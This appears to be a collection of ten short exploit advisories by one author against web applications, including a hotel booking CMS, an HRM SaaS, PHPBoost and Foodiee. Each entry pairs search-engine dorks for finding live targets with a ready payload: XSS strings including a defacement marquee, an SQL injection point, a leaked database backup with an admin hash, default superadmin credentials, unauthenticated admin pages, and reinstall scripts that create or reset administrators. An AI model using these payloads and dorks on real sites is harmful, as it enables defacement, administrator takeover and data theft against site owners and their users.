<pre><code>====================================================================================================================================<br />| # Title : HumbertoCaldas Cms v0.1.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 64.0.2 (32-bit) | <br />| # Vendor : http://humbertocaldas.com | <br />| # Dork : intext:"Site by Humberto Caldas" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : &lt;marquee&gt;&lt;font color=lime size=32&gt;Hacked by indoushka&lt;/font&gt;&lt;/marquee&gt;<br /><br />[+] http://127.0.0.1/indoorpadelcenterpt/noticia.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Human Resource PMS v1.4 Database Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 64.0.2 (32-bit) | <br />| # Vendor : http://creativeitem.com/ | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The application appears to leave backups in a world-accessible directory under the document root.<br /><br />[+] Use Payload : uploads/login_restore_db.sql<br /><br />[+] http://127.0.0.1/creativeitemcom/demo/hrm/uploads/login_restore_db.sql<br /><br />[+] Line 852 : (1,NULL,'Admin',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'admin@example.com','7110eda4d09e062aa5e4a390b0a572ac0d2c0220',NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,NULL),<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : hudaallah Linker CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.helpernt.com/vb/showthread.php?t=10749 |<br />| # Dork : تصميم وبرمجة موقع هدى الله |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Affected items :<br /><br /> /11/index.php <br /> /11/Install/install.php <br /> /11/sendmessage.php <br /><br />[+] Attack details :<br /><br /> URI was set to "onmouseover='prompt(977091)'bad="><br /> The input is reflected inside a tag parameter between double quotes.<br /> URI was set to "onmouseover='prompt(921483)'bad="><br /> The input is reflected inside a tag parameter between double quotes.<br /><br />[+] /11/sendmessage.php/%22onmouseover%3d'prompt(921483)'bad%3d%22><br />[+] /11/index.php/%22onmouseover%3d'prompt(977091)'bad%3d%22><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HS-booking CMS v2.79 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 68.0 (32-bit) |<br />| # Vendor : http://hotel-booking-script.com/ | <br />| # Dork : "index.php?page=check_hotels" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : /index.php?page=3&system_page=0<br /><br />[+] http://target_site/demo/index.php?page=3&system_page=0 <=====| inject here<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Foodiee - Online Food Ordering Web Application V1.0.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0 (64-bit) | <br />| # Vendor : https://codecanyon.net/item/foodiee-restaurant-web-application/23335754?s_rank=57 | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Register a new account.<br /><br />[+] Publication does not await approval from the site administrator.<br /> <br />[+] Panel : http://127.0.0.1/themeforestkamleshyadavnet/script/foodiee/admin/update_testimonial/1<br /><br />[+] Use Payload : &lt;script&gt;alert(/indoushka/);&lt;/script&gt; put it in any input and save<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HRM SAAS v 2.1.9 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0 (64-bit) | <br />| # Vendor : https://codecanyon.net/item/hrm-saas-human-resource-management/23400912?s_rank=48 | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The application appears to leave a default administrative account in place post installation.<br /><br />[+] Use Payload : Email : superadmin@example.com<br /> Password : 123456<br /><br />[+] https://127.0.0.1/bbscomunicacionescom/rrhh/public/super-admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PHPValley Micro Jobs v2.0.1 Missing Authentication Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.p30vel.ir |<br />| # Dork : Copyright (C) 2012 Ozgur Zeren (unity100@gmail.com) |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] Use Payload : /admin/header.php and admin/invadmin.php<br /><br />[+] http://127.0.0.1/phpvall/admin/header.php<br /><br />[+] http://127.0.0.1/phpvall/admin/invadmin.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hloun V1.0.0 Reinstall Script Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.facebook.com/LyonHost/ |<br />| # Dork : Powered by Hloun © Version 1.0.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The install file allows you to re-install the script.<br /><br />[+] The installation file allows you to re-install the script and add a new manager. The cause lies with the designer: <br /> deleting the installation folder is not recommended to the user, and the user does not think to delete the installation file.<br /><br />[+] Use Payload : /install.php?step=install<br /><br />[+] http://127.0.0.1/sharerhadith/install.php?step=install<br /><br />[+] Panel : http://127.0.0.1/sharerhadith/admincp/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hasan MWB v1 Reinstall Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 65.0 (32-bit) | <br />| # Vendor : http://hasanmwb.sourceforge.net/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The installation file allows you to re-install the script and add a new manager. The cause lies with the designer: <br /> deleting the installation folder is not recommended to the user, and the user does not think to delete the installation file.<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : /install.php<br /><br />[+] Enter new login information.<br /><br />[+] admin panel ====> http://127.0.0.1/hasanmwbsourceforgenet/panel/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PHPBoost v4.0 Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.phpboost.com |<br />| # Dork : Boosté par PHPBoost 4.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The setup file allows you to reset the site administrator login information.<br /><br />[+] Use Payload : install/install.php?step=6<br /><br />[+] http://target_site/install/install.php?step=6<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>